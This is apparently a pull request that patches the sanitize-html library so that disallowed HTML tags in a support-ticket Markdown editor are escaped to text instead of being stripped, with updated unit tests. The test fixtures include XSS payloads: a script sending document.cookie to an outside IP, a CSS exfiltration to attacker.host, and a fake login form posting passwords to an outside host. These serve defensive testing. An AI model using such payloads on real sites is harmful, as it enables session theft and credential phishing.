### PR TITLE
Markdown: Render Blacklisted Tags as Text

### DIFF
--- a/patches/@types+sanitize-html+1.18.3.patch
+++ b/patches/@types+sanitize-html+1.18.3.patch
@@ -1,0 +1,12 @@
+diff --git a/node_modules/@types/sanitize-html/index.d.ts b/node_modules/@types/sanitize-html/index.d.ts
+index 383ab80..a313d2c 100644
+--- a/node_modules/@types/sanitize-html/index.d.ts
++++ b/node_modules/@types/sanitize-html/index.d.ts
+@@ -47,6 +47,7 @@ declare namespace sanitize {
+     allowedStyles?:  { [index: string]: { [index: string]: RegExp[] } };
+     allowedClasses?: { [index: string]: string[] } | boolean;
+     allowedIframeHostnames?: string[];
++    escapeDisallowedTags?: boolean;
+     allowedSchemes?: string[] | boolean;
+     allowedSchemesByTag?: { [index: string]: string[] } | boolean;
+     allowedSchemesAppliedToAttributes?: string[];

--- a/patches/sanitize-html+1.20.1.patch
+++ b/patches/sanitize-html+1.20.1.patch
@@ -1,0 +1,222 @@
+diff --git a/node_modules/sanitize-html/dist/index.js b/node_modules/sanitize-html/dist/index.js
+index af039ba..9889c26 100644
+--- a/node_modules/sanitize-html/dist/index.js
++++ b/node_modules/sanitize-html/dist/index.js
+@@ -54,6 +54,7 @@ var VALID_HTML_ATTRIBUTE_NAME = /^[^\0\t\n\f\r /<=>]+$/;
+ 
+ function sanitizeHtml(html, options, _recursing) {
+   var result = '';
++  var tempResult = '';
+ 
+   function Frame(tag, attribs) {
+     var that = this;
+@@ -139,6 +140,7 @@ function sanitizeHtml(html, options, _recursing) {
+   var skipMap = {};
+   var transformMap = {};
+   var skipText = false;
++  var escapeDepth = 0;
+   var skipTextDepth = 0;
+ 
+   var parser = new htmlparser.Parser({
+@@ -147,6 +149,9 @@ function sanitizeHtml(html, options, _recursing) {
+         skipTextDepth++;
+         return;
+       }
++      if (escapeDepth > 0) {
++        escapeDepth++;
++      }
+       var frame = new Frame(name, attribs);
+       stack.push(frame);
+ 
+@@ -179,16 +184,27 @@ function sanitizeHtml(html, options, _recursing) {
+ 
+       if (options.allowedTags && options.allowedTags.indexOf(name) === -1) {
+         skip = true;
+-        if (nonTextTagsArray.indexOf(name) !== -1) {
+-          skipText = true;
+-          skipTextDepth = 1;
++        if (!options.escapeDisallowedTags) {
++          // We don't want to skip disallowedTags tags, just escape them
++          if (nonTextTagsArray.indexOf(name) !== -1) {
++            skipText = true;
++            skipTextDepth = 1;
++          }
++          skipMap[depth] = true;
+         }
+-        skipMap[depth] = true;
+       }
+       depth++;
+       if (skip) {
+         // We want the contents but not this tag
+-        return;
++        if (!options.escapeDisallowedTags) {
++          // We want the contents but not this tag
++          return;
++        }
++        if (escapeDepth === 0) {
++          tempResult = result;
++          result = '';
++          escapeDepth++;
++        }
+       }
+       result += '<' + name;
+       if (!allowedAttributesMap || has(allowedAttributesMap, name) || allowedAttributesMap['*']) {
+@@ -363,6 +379,10 @@ function sanitizeHtml(html, options, _recursing) {
+       }
+       if (options.selfClosing.indexOf(name) !== -1) {
+         result += " />";
++        if (escapeDepth > 0 && --escapeDepth === 0) {
++          result = tempResult + escapeHtml(result);
++          tempResult = '';
++        }
+       } else {
+         result += ">";
+         if (frame.innerText && !hasText && !options.textFilter) {
+@@ -413,6 +433,7 @@ function sanitizeHtml(html, options, _recursing) {
+         }
+       }
+ 
++      var shouldEscape = escapeDepth > 0 && --escapeDepth === 0;
+       var frame = stack.pop();
+       if (!frame) {
+         // Do not crash on bad markup
+@@ -444,6 +465,10 @@ function sanitizeHtml(html, options, _recursing) {
+       }
+ 
+       result += "</" + name + ">";
++      if (shouldEscape) {
++        result = tempResult + escapeHtml(result);
++        tempResult = '';
++      }
+     }
+   }, options.parser);
+   parser.write(html);
+@@ -455,6 +480,9 @@ function sanitizeHtml(html, options, _recursing) {
+     if (typeof s !== 'string') {
+       s = s + '';
+     }
++    if (escapeDepth > 0) {
++      return s;
++    }
+     if (options.parser.decodeEntities) {
+       s = s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/\>/g, '&gt;');
+       if (quote) {
+@@ -607,6 +635,7 @@ sanitizeHtml.defaults = {
+     // and if you do the URL is checked for safety
+     img: ['src']
+   },
++  escapeDisallowedTags: false,
+   // Lots of these won't come up by default because we don't allow them
+   selfClosing: ['img', 'br', 'hr', 'area', 'base', 'basefont', 'input', 'link', 'meta'],
+   // URL schemes we permit
+diff --git a/node_modules/sanitize-html/dist/sanitize-html.js b/node_modules/sanitize-html/dist/sanitize-html.js
+index 7dbc194..427150a 100644
+--- a/node_modules/sanitize-html/dist/sanitize-html.js
++++ b/node_modules/sanitize-html/dist/sanitize-html.js
+@@ -55,6 +55,7 @@ var VALID_HTML_ATTRIBUTE_NAME = /^[^\0\t\n\f\r /<=>]+$/;
+ 
+ function sanitizeHtml(html, options, _recursing) {
+   var result = '';
++  var tempResult = '';
+ 
+   function Frame(tag, attribs) {
+     var that = this;
+@@ -140,6 +141,7 @@ function sanitizeHtml(html, options, _recursing) {
+   var skipMap = {};
+   var transformMap = {};
+   var skipText = false;
++  var escapeDepth = 0;
+   var skipTextDepth = 0;
+ 
+   var parser = new htmlparser.Parser({
+@@ -148,6 +150,9 @@ function sanitizeHtml(html, options, _recursing) {
+         skipTextDepth++;
+         return;
+       }
++      if (escapeDepth > 0) {
++        escapeDepth++;
++      }
+       var frame = new Frame(name, attribs);
+       stack.push(frame);
+ 
+@@ -180,16 +185,26 @@ function sanitizeHtml(html, options, _recursing) {
+ 
+       if (options.allowedTags && options.allowedTags.indexOf(name) === -1) {
+         skip = true;
+-        if (nonTextTagsArray.indexOf(name) !== -1) {
+-          skipText = true;
+-          skipTextDepth = 1;
++        if (!options.escapeDisallowedTags) {
++          // We don't want to skip disallowedTags tags, just escape them
++          if (nonTextTagsArray.indexOf(name) !== -1) {
++            skipText = true;
++            skipTextDepth = 1;
++          }
++          skipMap[depth] = true;
+         }
+-        skipMap[depth] = true;
+       }
+       depth++;
+       if (skip) {
+-        // We want the contents but not this tag
+-        return;
++        if (!options.escapeDisallowedTags) {
++          // We want the contents but not this tag
++          return;
++        }
++        if (escapeDepth === 0) {
++          tempResult = result;
++          result = '';
++          escapeDepth++;
++        }
+       }
+       result += '<' + name;
+       if (!allowedAttributesMap || has(allowedAttributesMap, name) || allowedAttributesMap['*']) {
+@@ -364,6 +379,10 @@ function sanitizeHtml(html, options, _recursing) {
+       }
+       if (options.selfClosing.indexOf(name) !== -1) {
+         result += " />";
++        if (escapeDepth > 0 && --escapeDepth === 0) {
++          result = tempResult + escapeHtml(result);
++          tempResult = '';
++        }
+       } else {
+         result += ">";
+         if (frame.innerText && !hasText && !options.textFilter) {
+@@ -414,6 +433,7 @@ function sanitizeHtml(html, options, _recursing) {
+         }
+       }
+ 
++      var shouldEscape = escapeDepth > 0 && --escapeDepth === 0;
+       var frame = stack.pop();
+       if (!frame) {
+         // Do not crash on bad markup
+@@ -445,6 +465,10 @@ function sanitizeHtml(html, options, _recursing) {
+       }
+ 
+       result += "</" + name + ">";
++      if (shouldEscape) {
++        result = tempResult + escapeHtml(result);
++        tempResult = '';
++      }
+     }
+   }, options.parser);
+   parser.write(html);
+@@ -456,6 +480,9 @@ function sanitizeHtml(html, options, _recursing) {
+     if (typeof s !== 'string') {
+       s = s + '';
+     }
++    if (escapeDepth > 0) {
++      return s;
++    }
+     if (options.parser.decodeEntities) {
+       s = s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/\>/g, '&gt;');
+       if (quote) {
+@@ -608,6 +635,7 @@ sanitizeHtml.defaults = {
+     // and if you do the URL is checked for safety
+     img: ['src']
+   },
++  escapeDisallowedTags: false,
+   // Lots of these won't come up by default because we don't allow them
+   selfClosing: ['img', 'br', 'hr', 'area', 'base', 'basefont', 'input', 'link', 'meta'],
+   // URL schemes we permit

--- a/src/features/Support/SupportTicketDetail/TabbedReply/ReplyContainer.tsx
+++ b/src/features/Support/SupportTicketDetail/TabbedReply/ReplyContainer.tsx
@@ -6,7 +6,6 @@ import {
 import { lensPath, set } from 'ramda';
 import * as React from 'react';
 import { compose } from 'recompose';
-import { Converter } from 'showdown';
 
 import Grid from 'src/components/Grid';
 import Notice from 'src/components/Notice';
@@ -20,7 +19,6 @@ import TabbedReply from './TabbedReply';
 import { createReply, uploadAttachment } from 'src/services/support';
 import { getAPIErrorOrDefault } from 'src/utilities/errorUtils';
 import { getErrorMap } from 'src/utilities/errorUtils';
-import { sanitizeHTML } from 'src/utilities/sanitize-html';
 
 type ClassNames = 'root' | 'reference' | 'referenceRoot';
 
@@ -69,26 +67,6 @@ const ReplyContainer: React.FC<CombinedProps> = props => {
   const [files, setFiles] = React.useState<FileAttachment[]>([]);
 
   const submitForm = () => {
-    /** user may have entered markdown so convert it all to markup */
-    const rawMarkup = new Converter().makeHtml(value);
-    const sanitizedMarkup = sanitizeHTML(rawMarkup);
-
-    /**
-     * at this point, we might have an empty string or an empty p tag
-     * if the user entered ONLY bad markup. In this case, just display an
-     * error because it's not going to serve as a useful customer support ticket
-     */
-    if (sanitizedMarkup === '<p></p>' || !sanitizedMarkup) {
-      return setErrors([
-        {
-          reason: `Looks like you're attempting to submit a reply with non-allowed Markup.
-          While some Markup is supported, we recommend you use our reference guide and write your
-          reply as Markdown.`,
-          field: 'description'
-        }
-      ]);
-    }
-
     setSubmitting(true);
     setErrors(undefined);
 

--- a/src/utilities/sanitize-html/sanitize-html.test.ts
+++ b/src/utilities/sanitize-html/sanitize-html.test.ts
@@ -4,51 +4,54 @@ import { sanitizeHTML } from './sanitizeHTML';
 const script = '<script src=""></script>';
 const script2 = `<script>new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;</script>`;
 const xhrScript = `<script>
-var xhr = new XMLHttpRequest();
-xhr.open('POST','http://localhost:81/DVWA/vulnerabilities/xss_s/',true);
-xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
-xhr.send('txtName=xss&mtxMessage=xss&btnSign=Sign+Guestbook');
-</script>`;
+  var xhr = new XMLHttpRequest();
+  xhr.open('POST','http://localhost:81/DVWA/vulnerabilities/xss_s/',true);
+  xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
+  xhr.send('txtName=xss&mtxMessage=xss&btnSign=Sign+Guestbook');
+  </script>`;
 const aClick = '<a onClick="() => console.log("hello world")"></a>';
 const aClickLang =
   '<a lang="en-us" onClick="() => console.log("hello world")"></a>';
 const css = `<style>#username[value="mikeg"] {background:url("https://attacker.host/mikeg");}</style><input id="username" value="mikeg" />`;
 const login = `http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<h3>Please login to proceed</h3> <form action=http://192.168.149.128>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Logon"></br>`;
-const aScript = `a href="javascript:alert(8007)">Click me</a>`;
+const aScript = `<a href="javascript:alert(8007)">Click me</a>`;
 const queryString = `http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<script src="http://192.168.149.128/xss.js">`;
 
 /** allowed */
 const a = '<a href="helloworld.com">Hello world</a>';
 const aLang = '<a lang="en-us"></a>';
 
-it('should render script tags as text inside a p tag', () => {
-  expect(sanitizeHTML(script)).toBe(
-    '<p>&lt;script src=&gt;&lt;/script&gt;</p>'
-  );
+it('should escape script tags, retain child text, and strip attributes', () => {
+  expect(sanitizeHTML(script)).toBe('&lt;script&gt;&lt;/script&gt;');
   expect(sanitizeHTML(script2)).toBe(
-    '<p>&lt;script&gt;&lt;/script&gt;&lt;script&gt;&lt;/script&gt;</p>'
+    '&lt;script&gt;new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;&lt;/script&gt;'
   );
   expect(sanitizeHTML(xhrScript)).toBe(
-    '<p>&lt;script&gt;&lt;/script&gt;&lt;script&gt;&lt;/script&gt;</p>'
+    `&lt;script&gt;
+  var xhr = new XMLHttpRequest();
+  xhr.open('POST','http://localhost:81/DVWA/vulnerabilities/xss_s/',true);
+  xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
+  xhr.send('txtName=xss&amp;mtxMessage=xss&amp;btnSign=Sign+Guestbook');
+  &lt;/script&gt;`
   );
 });
 
-it('should remove unwanted blacklisted tags', () => {
+it('should escape unwanted blacklisted tags', () => {
   expect(sanitizeHTML(login)).toBe(
-    'http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<h3>Please login to proceed</h3> Username:<br /><br />Password:<br /><br /><br /><br />'
+    '<form>Username:<br />&lt;input /&gt;<br />Password:<br />&lt;input /&gt;<br /><br />&lt;input /&gt;<br /></form>'
   );
-  expect(sanitizeHTML(aScript)).toBe(
-    `a href=\"javascript:alert(8007)\"&gt;Click me`
-  );
+  expect(sanitizeHTML(aScript)).toBe(`<a>Click me</a>`);
 });
 
-it('should not allow CSS attacks', () => {
-  expect(sanitizeHTML(css)).toBe('');
+it('should not allow CSS attacks by escaping the style tag', () => {
+  expect(sanitizeHTML(css)).toBe(
+    '&lt;style&gt;#username[value="mikeg"] {background:url("https://attacker.host/mikeg");}&lt;/style&gt;&lt;input /&gt;'
+  );
 });
 
 it('should not allow query string attacks', () => {
   expect(sanitizeHTML(queryString)).toBe(
-    'http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<p>&lt;script src=http://192.168.149.128/xss.js&gt;&lt;/script&gt;</p>'
+    'http://localhost:81/DVWA/vulnerabilities/xss_r/?name=&lt;script&gt;&lt;/script&gt;'
   );
 });
 

--- a/src/utilities/sanitize-html/sanitize-html.test.ts
+++ b/src/utilities/sanitize-html/sanitize-html.test.ts
@@ -21,10 +21,16 @@ const queryString = `http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<scrip
 const a = '<a href="helloworld.com">Hello world</a>';
 const aLang = '<a lang="en-us"></a>';
 
-it('should get rid of all script tags', () => {
-  expect(sanitizeHTML(script)).toBe('');
-  expect(sanitizeHTML(script2)).toBe('');
-  expect(sanitizeHTML(xhrScript)).toBe('');
+it('should render script tags as text inside a p tag', () => {
+  expect(sanitizeHTML(script)).toBe(
+    '<p>&lt;script src=&gt;&lt;/script&gt;</p>'
+  );
+  expect(sanitizeHTML(script2)).toBe(
+    '<p>&lt;script&gt;&lt;/script&gt;&lt;script&gt;&lt;/script&gt;</p>'
+  );
+  expect(sanitizeHTML(xhrScript)).toBe(
+    '<p>&lt;script&gt;&lt;/script&gt;&lt;script&gt;&lt;/script&gt;</p>'
+  );
 });
 
 it('should remove unwanted blacklisted tags', () => {
@@ -42,7 +48,7 @@ it('should not allow CSS attacks', () => {
 
 it('should not allow query string attacks', () => {
   expect(sanitizeHTML(queryString)).toBe(
-    'http://localhost:81/DVWA/vulnerabilities/xss_r/?name='
+    'http://localhost:81/DVWA/vulnerabilities/xss_r/?name=<p>&lt;script src=http://192.168.149.128/xss.js&gt;&lt;/script&gt;</p>'
   );
 });
 

--- a/src/utilities/sanitize-html/sanitizeHTML.ts
+++ b/src/utilities/sanitize-html/sanitizeHTML.ts
@@ -3,23 +3,34 @@ import { allowedHTMLAttr, allowedHTMLTags } from 'src/constants';
 
 export const sanitizeHTML = (text: string) =>
   sanitize(text, {
-    allowedTags: [...allowedHTMLTags, 'script'],
+    allowedTags: allowedHTMLTags,
     allowedAttributes: {
       '*': allowedHTMLAttr,
       /** only allowing classes on spans for the sole purpose of code highlighting */
       span: ['class']
     },
+    /**
+     * this option is not supported and was patched
+     * See: https://github.com/punkave/sanitize-html/pull/169
+     */
+    escapeDisallowedTags: true
     /** this is basically just converting script tags to text */
-    transformTags: {
-      script: (tagName, attrs: Record<string, string>) => {
-        const attrsAsString = Object.keys(attrs).reduce((accum, eachKey) => {
-          return `${accum} ${eachKey}=${attrs[eachKey]}`;
-        }, '');
-        return {
-          tagName: 'p',
-          text: `&lt;${tagName}${attrsAsString}&gt;&lt;/${tagName}&gt;`,
-          attribs: {}
-        };
-      }
-    }
+    // transformTags: {
+    //   script: (tagName, attrs: Record<string, string>) => {
+    //     /**
+    //      * get all attributes of the script tag and recreate them as they were typed
+    //      * i.e src="hello.js"
+    //      */
+    //     const attrsAsString = Object.keys(attrs).reduce((accum, eachKey) => {
+    //       return `${accum} ${eachKey}="${attrs[eachKey]}"`;
+    //     }, '');
+
+    //     /** return the script tag as text inside a p tag */
+    //     return {
+    //       tagName: 'script',
+    //       text: `&lt;${tagName}${attrsAsString}&gt;&lt;/${tagName}&gt;`,
+    //       attribs: {}
+    //     };
+    //   }
+    // }
   }).trim();

--- a/src/utilities/sanitize-html/sanitizeHTML.ts
+++ b/src/utilities/sanitize-html/sanitizeHTML.ts
@@ -3,10 +3,23 @@ import { allowedHTMLAttr, allowedHTMLTags } from 'src/constants';
 
 export const sanitizeHTML = (text: string) =>
   sanitize(text, {
-    allowedTags: allowedHTMLTags,
+    allowedTags: [...allowedHTMLTags, 'script'],
     allowedAttributes: {
       '*': allowedHTMLAttr,
       /** only allowing classes on spans for the sole purpose of code highlighting */
       span: ['class']
+    },
+    /** this is basically just converting script tags to text */
+    transformTags: {
+      script: (tagName, attrs: Record<string, string>) => {
+        const attrsAsString = Object.keys(attrs).reduce((accum, eachKey) => {
+          return `${accum} ${eachKey}=${attrs[eachKey]}`;
+        }, '');
+        return {
+          tagName: 'p',
+          text: `&lt;${tagName}${attrsAsString}&gt;&lt;/${tagName}&gt;`,
+          attribs: {}
+        };
+      }
     }
   }).trim();


### PR DESCRIPTION
## Description

Renders Blacklisted tags as text, including unknown tags.

This will still strip the attributes, please note.

## Type of Change
- Non breaking change ('update', 'change')

## Applicable E2E Tests

N/A

## To Test

Try variations of

'''  <------ pretend these are backticks
<script src="hello.js"></script>
'''

<script>alert('hello world');</script>

<marty>Hello world</marty>

<p><script></script></p>